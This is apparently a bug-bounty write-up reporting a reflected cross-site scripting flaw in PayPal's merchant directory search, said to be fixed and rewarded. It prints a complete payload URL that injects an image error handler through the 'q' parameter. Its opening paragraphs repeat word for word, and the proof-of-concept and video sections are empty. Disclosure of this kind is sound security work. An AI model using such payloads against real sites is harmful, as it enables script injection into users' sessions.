Hello Leets,
Today i am writing about my finding on Paypal.com
That's a XSS ( Cross Site Scripting )......
The Story began at the 31st December 2014 when all people's are enjoying the new year celebration and i was engaged in finding security bugs...
Then i was try to hunting a paypal site...
After lots of try i found a pattern to inject my code to execute the XSS bug..
So the Vulnerable perameter is
q =
Vulnerable link:
===========
https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E
Today i am writing about my finding on Paypal.com
That's a XSS ( Cross Site Scripting )......
The Story began at the 31st December 2014 when all people's are enjoying the new year celebration and i was engaged in finding security bugs...
Then i was try to hunting a paypal site...
After lots of try i found a pattern to inject my code to execute the XSS bug..
So the Vulnerable perameter is
q =
Vulnerable link:
===========
https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E
Poc:
=====
Video Demo:
==========
The bug is fixed Now and paypal pays me a bounty of 750$...
Thanks Paypal team....
